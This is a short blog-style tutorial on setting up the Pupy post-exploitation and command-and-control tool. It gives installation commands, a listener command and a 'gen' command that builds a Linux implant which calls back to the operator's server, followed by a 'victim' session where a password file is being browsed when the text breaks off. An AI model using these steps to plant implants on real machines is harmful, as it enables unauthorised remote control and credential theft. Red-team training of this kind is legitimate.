[Offensive Security] Command and Control with Pupy!!

Takahiro Oda
3 min readJan 16, 2022

What is Pupy?

Pupy is an open-source remote admin and post-exploitation tool written in python. Pupy executes in memory, allowing it to leave a low footprint. Pupy also offers multiple communications channel options to make traffic.


  • initial access
  • execution
  • persistence
  • privillege escalation
  • defense evasion
  • credential access
  • discovery
  • lateral movement
  • collection
  • command & control
  • exfilltration
  • impact



To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy

Now download all the requirements using pip like the following command :

cd pupy
pip install -r requirements.txt

Now run pupy using the following command :


Establish a new session

Pupy Server: Main Terminal

config list

  • This command shows all configurations, including the [listeners].

listen -a rsa

gen --output output/linux.ln --output-dir /project --debug -f client -O linux -A x64 connect --host -t rsa

Victim — Linux

After 60 seconds, the implant should connect to the Pupy server.

Pupy Server: Main Terminal

  • ls
  • Notice the password.txt within the…